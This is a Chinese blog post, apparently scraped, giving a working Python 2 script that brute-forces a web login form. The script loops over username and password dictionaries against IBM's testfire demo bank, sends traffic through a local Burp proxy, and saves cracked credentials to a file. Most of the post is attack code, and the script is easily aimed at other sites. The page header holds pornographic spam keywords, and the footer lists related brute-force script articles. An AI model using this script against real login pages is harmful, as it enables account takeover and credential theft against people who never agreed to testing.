成人国产在线小视频_日韩寡妇人妻调教在线播放_色成人www永久在线观看_2018国产精品久久_亚洲欧美高清在线30p_亚洲少妇综合一区_黄色在线播放国产_亚洲另类技巧小说校园_国产主播xx日韩_a级毛片在线免费

資訊專(zhuān)欄INFORMATION COLUMN

使用 python 的 urllib2和 urllib模塊爆破 form 表單的簡(jiǎn)易腳本

crossea / 609人閱讀

摘要:導(dǎo)入用戶(hù)名字典導(dǎo)入密碼的字典找到個(gè)賬號(hào)密碼輸入有點(diǎn)丑將就用下

python 的 http 中 urllib2和 urllib模塊在web 表單爆破的使用方法

腳本中還增加了 urllib2和 urllib模塊如何添加代理的方法

# -*- coding: utf-8 -*-
import urllib2
import urllib
import time


def brute_force(user, password):
    #strip() 方法用于移除字符串頭尾指定的字符(默認(rèn)為空格)
    name = user.strip()
    passwd = password.strip()

    #添加代理:本地8080端口的代理是 burp 工具,主要是查看腳本發(fā)包回包的情況,好定位問(wèn)題
    
    proxy = urllib2.ProxyHandler({"http":"http://127.0.0.1:8080"})
    opener = urllib2.build_opener(proxy)
    urllib2.install_opener(opener)

    #IBM 公司的一個(gè) 測(cè)試網(wǎng)站
    url1 = "http://demo.testfire.net/bank/login.aspx"
    user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
    headers = {"User-Agent":user_agent,"Content-Type": "application/x-www-form-urlencoded", "Referer": "http://demo.testfire.net/bank/login.aspx"}
    values = {"uid": name, "passw": passwd,"btnSubmit":"Login"}
    data = urllib.urlencode(values)#可以把key-value這樣的鍵值對(duì)轉(zhuǎn)換成我們想要的格式,返回的是a=1&b=2這樣的字符串
    request = urllib2.Request(url1,data,headers)
    response = urllib2.urlopen(request)
    url2 = response.geturl()
    time.sleep(3)


    if url2 != url1:
        #因?yàn)閡rllib2 返回的頁(yè)面如果存在302重定向,返回的頁(yè)面是重定向之后的頁(yè)面,所以不能以302狀態(tài)碼來(lái)判斷是否登錄成功,
        #因?yàn)橹囟ㄏ蛑蟮捻?yè)面訪(fǎng)問(wèn)成功是200,不是302;所以以返回的頁(yè)面是不是發(fā)生變化來(lái)判斷是否是否登錄成功。

        print "---- find user:", name, " with password:",passwd, "-----"
        print url2
        outFile.write(name + ":" + passwd+"
" )
    else:
        print "----- error user:", name, " with password:",passwd, "-----"
        print url2
    response.close()
    return



outFile = open("accounts-cracked.txt", "w")

if __name__ == "__main__":
    #導(dǎo)入用戶(hù)名字典
    with open("user.dic", "r") as userline:
        y = userline.readlines()
        #導(dǎo)入密碼的字典
        with open("pass.dic", "r") as passline:
            b= passline.readlines()
            for u in y:
                for p in b:
                    brute_force(user=u,password=p)
                    
outFile.close()
with open("accounts-cracked.txt","r") as text:
    list = text.readlines()
    sum=len(list)

if sum>0:
    print "找到",sum,"個(gè)賬號(hào)密碼"
else:
    print "All thread OK,maybe not "

輸入有點(diǎn)丑,將就用下

文章版權(quán)歸作者所有,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。

轉(zhuǎn)載請(qǐng)注明本文地址:http://systransis.cn/yun/11236.html

相關(guān)文章

  • 使用 python urllib2 urllib模塊爆破 form 表單簡(jiǎn)易腳本

    摘要:導(dǎo)入用戶(hù)名字典導(dǎo)入密碼的字典找到個(gè)賬號(hào)密碼輸入有點(diǎn)丑將就用下 python 的 http 中 urllib2和 urllib模塊在web 表單爆破的使用方法 腳本中還增加了 urllib2和 urllib模塊如何添加代理的方法 # -*- coding: utf-8 -*- import urllib2 import urllib import time def brute_f...

    loostudy 評(píng)論0 收藏0

  • 使用 python request模塊爆破 form 表單簡(jiǎn)易腳本

    摘要:的中模塊在表單爆破的使用方法模塊中代理的使用方式模塊是中比較全的模塊簡(jiǎn)單易用比之前文章中使用的都要好用可以替換為的方法方法用于移除字符串頭尾指定的字符默認(rèn)為空格添加代理本地端口的代理是工具主要是查看腳本發(fā)包回包的情況好定位問(wèn)題如 python 的 http 中 request模塊在web 表單爆破的使用方法 request模塊中代理的使用方式 request 模塊是http 中比較全...

    mgckid 評(píng)論0 收藏0

  • 使用 python request模塊爆破 form 表單簡(jiǎn)易腳本

    摘要:的中模塊在表單爆破的使用方法模塊中代理的使用方式模塊是中比較全的模塊簡(jiǎn)單易用比之前文章中使用的都要好用可以替換為的方法方法用于移除字符串頭尾指定的字符默認(rèn)為空格添加代理本地端口的代理是工具主要是查看腳本發(fā)包回包的情況好定位問(wèn)題如 python 的 http 中 request模塊在web 表單爆破的使用方法 request模塊中代理的使用方式 request 模塊是http 中比較全...

    alanoddsoff 評(píng)論0 收藏0

  • 使用 python httplib模塊爆破 form 表單簡(jiǎn)易腳本

    摘要:包含了爆破的表單的使用方法中代理的添加方法添加代理代理本地監(jiān)聽(tīng)一個(gè)端口目的是查看發(fā)包和回包的情況測(cè)試網(wǎng)站為的靶機(jī)網(wǎng)站頁(yè)面返回的頁(yè)面找到個(gè)賬號(hào)密碼 httplib: 包含了 httplib爆破 web 的 form 表單的使用方法 httplib 中代理的添加方法 # -*- coding: utf-8 -*- import urllib import httplib import ...

    alighters 評(píng)論0 收藏0

  • 使用 python httplib模塊爆破 form 表單簡(jiǎn)易腳本

    摘要:包含了爆破的表單的使用方法中代理的添加方法添加代理代理本地監(jiān)聽(tīng)一個(gè)端口目的是查看發(fā)包和回包的情況測(cè)試網(wǎng)站為的靶機(jī)網(wǎng)站頁(yè)面返回的頁(yè)面找到個(gè)賬號(hào)密碼 httplib: 包含了 httplib爆破 web 的 form 表單的使用方法 httplib 中代理的添加方法 # -*- coding: utf-8 -*- import urllib import httplib import ...

    IntMain 評(píng)論0 收藏0

發(fā)表評(píng)論

0條評(píng)論

最新活動(dòng)
閱讀需要支付1元查看
<